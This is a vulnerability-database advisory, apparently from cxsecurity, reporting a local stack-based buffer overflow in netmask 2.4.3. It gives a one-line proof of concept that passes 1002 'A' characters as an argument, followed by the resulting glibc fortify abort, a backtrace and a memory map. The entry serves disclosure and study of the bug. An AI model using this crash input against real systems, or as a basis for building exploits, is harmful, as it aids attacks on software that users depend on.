netmask stack-based buffer overflow

2017.06.20
Credit: Hosein Askari
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

################ #Exploit Title: netmask stack-based buffer overflow #CWE: CWE-119 #Exploit Author: Hosein Askari #Version : 2.4.3 #Tested on: kali linux #Category: Application #Author Mail : hosein.askari@aol.com ############################### #sudo netmask $(python -c 'print "A"*1002') *** buffer overflow detected ***: netmask terminated ======= Backtrace: ========= /lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7e62f4a] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7ef4db8] /lib/i386-linux-gnu/libc.so.6(+0xf7fe8)[0xb7ef2fe8] /lib/i386-linux-gnu/libc.so.6(+0xf77f8)[0xb7ef27f8] /lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7e67846] /lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0x1d7b)[0xb7e3f57b] /lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x8d)[0xb7ef288d] /lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb7ef27e0] netmask[0x804c013] netmask(warn+0x32)[0x804c102] netmask[0x8048be7] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7e13276] netmask[0x8048c85] ======= Memory map: ======== 08048000-0804e000 r-xp 00000000 08:01 1310931 /usr/bin/netmask 0804e000-0804f000 r--p 00005000 08:01 1310931 /usr/bin/netmask 0804f000-08050000 rw-p 00006000 08:01 1310931 /usr/bin/netmask 08050000-08071000 rw-p 00000000 00:00 0 [heap] b7caf000-b7d26000 r-xp 00000000 08:01 917592 /lib/i386-linux-gnu/libpcre.so.3.13.3 b7d26000-b7d27000 r--p 00076000 08:01 917592 /lib/i386-linux-gnu/libpcre.so.3.13.3 b7d27000-b7d28000 rw-p 00077000 08:01 917592 /lib/i386-linux-gnu/libpcre.so.3.13.3 b7d28000-b7d41000 r-xp 00000000 08:01 924791 /lib/i386-linux-gnu/libpthread-2.24.so b7d41000-b7d42000 r--p 00018000 08:01 924791 /lib/i386-linux-gnu/libpthread-2.24.so b7d42000-b7d43000 rw-p 00019000 08:01 924791 /lib/i386-linux-gnu/libpthread-2.24.so b7d43000-b7d45000 rw-p 00000000 00:00 0 b7d45000-b7d61000 r-xp 00000000 08:01 922883 /lib/i386-linux-gnu/libgcc_s.so.1 b7d61000-b7d62000 r--p 0001b000 08:01 922883 /lib/i386-linux-gnu/libgcc_s.so.1 b7d62000-b7d63000 rw-p 0001c000 08:01 922883 /lib/i386-linux-gnu/libgcc_s.so.1 b7d63000-b7d66000 r-xp 00000000 08:01 924780 /lib/i386-linux-gnu/libdl-2.24.so b7d66000-b7d67000 r--p 00002000 08:01 924780 /lib/i386-linux-gnu/libdl-2.24.so b7d67000-b7d68000 rw-p 00003000 08:01 924780 /lib/i386-linux-gnu/libdl-2.24.so b7d68000-b7d6f000 r-xp 00000000 08:01 924793 /lib/i386-linux-gnu/librt-2.24.so b7d6f000-b7d70000 r--p 00006000 08:01 924793 /lib/i386-linux-gnu/librt-2.24.so b7d70000-b7d71000 rw-p 00007000 08:01 924793 /lib/i386-linux-gnu/librt-2.24.so b7d71000-b7d9a000 r-xp 00000000 08:01 919192 /lib/i386-linux-gnu/libselinux.so.1 b7d9a000-b7d9b000 r--p 00028000 08:01 919192 /lib/i386-linux-gnu/libselinux.so.1 b7d9b000-b7d9c000 rw-p 00029000 08:01 919192 /lib/i386-linux-gnu/libselinux.so.1 b7d9c000-b7d9d000 rw-p 00000000 00:00 0 b7d9d000-b7de1000 r-xp 00000000 08:01 919036 /lib/i386-linux-gnu/libnss_resolve.so.2 b7de1000-b7de3000 r--p 00043000 08:01 919036 /lib/i386-linux-gnu/libnss_resolve.so.2 b7de3000-b7de4000 rw-p 00045000 08:01 919036 /lib/i386-linux-gnu/libnss_resolve.so.2 b7de4000-b7de6000 r-xp 00000000 08:01 922807 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2 b7de6000-b7de7000 r--p 00001000 08:01 922807 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2 b7de7000-b7de8000 rw-p 00002000 08:01 922807 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2 b7de8000-b7df3000 r-xp 00000000 08:01 924786 /lib/i386-linux-gnu/libnss_files-2.24.so b7df3000-b7df4000 r--p 0000a000 08:01 924786 /lib/i386-linux-gnu/libnss_files-2.24.so b7df4000-b7df5000 rw-p 0000b000 08:01 924786 /lib/i386-linux-gnu/libnss_files-2.24.so b7df5000-b7dfb000 rw-p 00000000 00:00 0 b7dfb000-b7fae000 r-xp 00000000 08:01 924777 /lib/i386-linux-gnu/libc-2.24.so b7fae000-b7faf000 ---p 001b3000 08:01 924777 /lib/i386-linux-gnu/libc-2.24.so b7faf000-b7fb1000 r--p 001b3000 08:01 924777 /lib/i386-linux-gnu/libc-2.24.so b7fb1000-b7fb2000 rw-p 001b5000 08:01 924777 /lib/i386-linux-gnu/libc-2.24.so b7fb2000-b7fb5000 rw-p 00000000 00:00 0 b7fd4000-b7fd7000 rw-p 00000000 00:00 0 b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar] b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso] b7fdb000-b7ffd000 r-xp 00000000 08:01 922884 /lib/i386-linux-gnu/ld-2.24.so b7ffd000-b7ffe000 rw-p 00000000 00:00 0 b7ffe000-b7fff000 r--p 00022000 08:01 922884 /lib/i386-linux-gnu/ld-2.24.so b7fff000-b8000000 rw-p 00023000 08:01 922884 /lib/i386-linux-gnu/ld-2.24.so bffdf000-c0000000 rw-p 00000000 00:00 0 [stack] Aborted (core dumped)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top